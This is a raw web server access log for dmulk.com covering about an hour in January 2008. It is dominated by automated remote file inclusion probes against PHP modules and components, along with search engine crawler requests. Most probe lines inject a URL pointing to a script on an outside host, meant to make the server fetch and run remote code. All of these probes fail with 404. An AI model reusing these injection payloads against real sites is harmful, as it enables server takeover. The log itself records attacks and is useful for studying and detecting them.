66.98.150.12 - - [22/Jan/2008:08:12:09 -0800] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.spices.res.in/biotraineeship.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.27.39 - - [22/Jan/2008:08:12:51 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.hapich.com/pix/admin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
80.67.27.39 - - [22/Jan/2008:08:12:52 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.hapich.com/pix/admin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
64.76.186.87 - - [22/Jan/2008:08:15:22 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [22/Jan/2008:08:15:24 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.103.8.225 - - [22/Jan/2008:08:15:33 -0800] "GET /index.php?redir=http://203.197.248.118:1971/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.28.203 - - [22/Jan/2008:08:17:33 -0800] "GET /megumi/Bracelet/?D=A HTTP/1.0" 200 1689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.53.114.5 - - [22/Jan/2008:08:19:46 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://www.arabx1st.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.114.5 - - [22/Jan/2008:08:19:46 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.arabx1st.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.126 - - [22/Jan/2008:08:21:52 -0800] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20071214 BonEcho/2.0.0.4" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:08:23:06 -0800] "GET /logs/nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.148.232.98 - - [22/Jan/2008:08:25:44 -0800] "GET //components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/1/21/1711593/temp/echox? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.152.84 - - [22/Jan/2008:08:27:54 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
70.84.152.84 - - [22/Jan/2008:08:27:54 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
74.6.24.212 - - [22/Jan/2008:08:34:27 -0800] "GET /logs/access_080111.log HTTP/1.0" 200 683006 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.31 - - [22/Jan/2008:08:35:33 -0800] "GET /logs/access_080113.log HTTP/1.0" 200 324995 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [22/Jan/2008:08:35:41 -0800] "GET /logs/access.log HTTP/1.0" 200 128845 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.98.246.16 - - [22/Jan/2008:08:35:42 -0800] "GET /link.php?do=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:08:36:10 -0800] "GET /logs//administrator/components/com_slideshow1/admin.slideshow1.php?mosconfig_live_site=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:08:36:10 -0800] "GET //administrator/components/com_slideshow1/admin.slideshow1.php?mosconfig_live_site=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [22/Jan/2008:08:39:04 -0800] "GET /logs/access_071229.log//index.php?lang=en&page=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [22/Jan/2008:08:39:04 -0800] "GET //index.php?lang=en&page=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [22/Jan/2008:08:39:05 -0800] "GET /logs//index.php?lang=en&page=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.221 - - [22/Jan/2008:08:40:31 -0800] "GET /tools/ HTTP/1.0" 200 12388 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.69.222.121 - - [22/Jan/2008:08:41:36 -0800] "GET /logs/access_071205.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.55.11.58 - - [22/Jan/2008:08:42:57 -0800] "GET /errors.php?error=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:08:43:18 -0800] "GET /logs/access.log/modifyform.html?code=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:08:43:18 -0800] "GET /modifyform.html?code=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:08:43:19 -0800] "GET /logs/modifyform.html?code=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.246.16 - - [22/Jan/2008:08:43:29 -0800] "GET /logs/access_071229.log/link.php?do=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.16 - - [22/Jan/2008:08:43:30 -0800] "GET /logs/link.php?do=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:08:43:44 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:08:44:28 -0800] "GET /modifyform.html?code=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:08:49:07 -0800] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:08:49:08 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:08:49:09 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:08:51:59 -0800] "GET /robots.txt HTTP/1.1" 403 163 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
66.249.70.19 - - [22/Jan/2008:08:51:59 -0800] "HEAD /bikes/dteel/MVI_2430.AVI HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
66.249.70.19 - - [22/Jan/2008:08:51:59 -0800] "HEAD /bikes/dteel/MVI_2434.AVI HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
64.76.186.87 - - [22/Jan/2008:08:52:10 -0800] "GET /logs/access.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [22/Jan/2008:08:52:13 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.246.16 - - [22/Jan/2008:08:52:47 -0800] "GET /forum.php?seite=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.148.232.98 - - [22/Jan/2008:08:53:07 -0800] "GET /logs/access_071216.log//components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/1/21/1711593/temp/echox? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.148.232.98 - - [22/Jan/2008:08:53:08 -0800] "GET /logs//components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/1/21/1711593/temp/echox? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.126 - - [22/Jan/2008:08:54:29 -0800] "GET /tmp/?S=D HTTP/1.0" 200 1322 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.58.141.110 - - [22/Jan/2008:08:55:03 -0800] "GET /logs/access_080101.log/send_reminders.php?noSet=0&includedir=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [22/Jan/2008:08:55:04 -0800] "GET /send_reminders.php?noSet=0&includedir=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [22/Jan/2008:08:55:04 -0800] "GET /logs/send_reminders.php?noSet=0&includedir=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.226.76.97 - - [22/Jan/2008:08:55:55 -0800] "GET /logs/access_071230.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.226.76.97 - - [22/Jan/2008:08:55:55 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.226.76.97 - - [22/Jan/2008:08:55:55 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.67.27.39 - - [22/Jan/2008:08:56:21 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hapich.com/pix/admin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
80.67.27.39 - - [22/Jan/2008:08:56:21 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hapich.com/pix/admin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
74.6.19.110 - - [22/Jan/2008:08:56:33 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.216.109 - - [22/Jan/2008:08:56:33 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.249.106.130 - - [22/Jan/2008:08:56:38 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
72.249.106.130 - - [22/Jan/2008:08:56:38 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
201.77.160.127 - - [22/Jan/2008:08:58:20 -0800] "GET /logs/access_071229.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/d3rf/list.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.77.160.127 - - [22/Jan/2008:08:58:21 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/d3rf/list.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.77.160.127 - - [22/Jan/2008:08:58:22 -0800] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/d3rf/list.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.16 - - [22/Jan/2008:09:00:15 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.16 - - [22/Jan/2008:09:00:22 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.55.11.58 - - [22/Jan/2008:09:01:11 -0800] "GET /logs/access.log/errors.php?error=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.55.11.58 - - [22/Jan/2008:09:01:11 -0800] "GET /logs/errors.php?error=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.148.232.98 - - [22/Jan/2008:09:01:15 -0800] "GET /logs/access.log//components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/1/21/1711593/temp/echox? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.187.243 - - [22/Jan/2008:09:01:34 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.187.243 - - [22/Jan/2008:09:01:34 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.187.243 - - [22/Jan/2008:09:01:35 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.6.23.108 - - [22/Jan/2008:09:03:11 -0800] "GET /bikes/dteel/EQ2/?S=A HTTP/1.0" 200 825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.114.156 - - [22/Jan/2008:09:05:38 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.buergerfunk-bochum.de/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.114.156 - - [22/Jan/2008:09:05:38 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.buergerfunk-bochum.de/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.74.190 - - [22/Jan/2008:09:06:26 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://superprast.net/file/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.171 - - [22/Jan/2008:09:06:29 -0800] "GET /logs/access_080112.log HTTP/1.0" 200 749755 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.141.54.186 - - [22/Jan/2008:09:06:45 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.animeburg.ru/images/safes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.249.106.130 - - [22/Jan/2008:09:06:45 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
72.249.106.130 - - [22/Jan/2008:09:06:45 -0800] "GET //skin/zero_vote/error.php?dir=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
62.141.54.186 - - [22/Jan/2008:09:06:53 -0800] "GET //appserv/main.php?appserv_root=http://www.animeburg.ru/images/safes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.84.152.84 - - [22/Jan/2008:09:07:06 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
70.84.152.84 - - [22/Jan/2008:09:07:06 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
209.200.245.108 - - [22/Jan/2008:09:07:45 -0800] "GET //popup_window.php?site_isp_root=http://www.seucu.us/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.200.245.108 - - [22/Jan/2008:09:07:45 -0800] "GET /logs//popup_window.php?site_isp_root=http://www.seucu.us/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
202.60.74.190 - - [22/Jan/2008:09:07:50 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.74.190 - - [22/Jan/2008:09:07:50 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.74.190 - - [22/Jan/2008:09:07:50 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.212.80.130 - - [22/Jan/2008:09:08:52 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://heartlandcandles.org/cart/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
89.212.80.130 - - [22/Jan/2008:09:08:52 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://heartlandcandles.org/cart/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
72.232.206.90 - - [22/Jan/2008:09:09:11 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
72.232.206.90 - - [22/Jan/2008:09:09:11 -0800] "GET //skin/zero_vote/error.php?dir=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
68.8.232.250 - warboard [22/Jan/2008:09:11:08 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33136 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
64.76.186.87 - - [22/Jan/2008:09:11:16 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.55.11.58 - - [22/Jan/2008:09:12:42 -0800] "GET /logs/access_071229.log/errors.php?error=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.226.76.97 - - [22/Jan/2008:09:12:48 -0800] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.38.160.131 - - [22/Jan/2008:09:12:53 -0800] "GET //errors.php?error=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.38.160.131 - - [22/Jan/2008:09:12:54 -0800] "GET /logs//errors.php?error=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:09:14:50 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.246.16 - - [22/Jan/2008:09:14:50 -0800] "GET /logs/access_071229.log/forum.php?seite=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:09:14:50 -0800] "GET //appserv/main.php?appserv_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:09:14:50 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.246.16 - - [22/Jan/2008:09:14:50 -0800] "GET /logs/forum.php?seite=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.16 - - [22/Jan/2008:09:14:54 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.77.160.127 - - [22/Jan/2008:09:15:07 -0800] "GET /logs/access.log/My_eGallery/public/displayCategory.php?basepath=http://www.laila.jp/item_pics/d3rf/list.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.77.160.127 - - [22/Jan/2008:09:15:08 -0800] "GET /My_eGallery/public/displayCategory.php?basepath=http://www.laila.jp/item_pics/d3rf/list.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.77.160.127 - - [22/Jan/2008:09:15:09 -0800] "GET /logs/My_eGallery/public/displayCategory.php?basepath=http://www.laila.jp/item_pics/d3rf/list.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.114.156 - - [22/Jan/2008:09:16:56 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.buergerfunk-bochum.de/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.114.156 - - [22/Jan/2008:09:16:56 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.buergerfunk-bochum.de/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.77.160.127 - - [22/Jan/2008:09:17:58 -0800] "GET /logs/access.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.laila.jp/item_pics/d3rf/list.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.77.160.127 - - [22/Jan/2008:09:17:59 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.laila.jp/item_pics/d3rf/list.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.77.160.127 - - [22/Jan/2008:09:18:00 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.laila.jp/item_pics/d3rf/list.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.77.160.127 - - [22/Jan/2008:09:18:06 -0800] "GET /logs/access.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.laila.jp/item_pics/d3rf/list.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.77.160.127 - - [22/Jan/2008:09:18:08 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.laila.jp/item_pics/d3rf/list.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
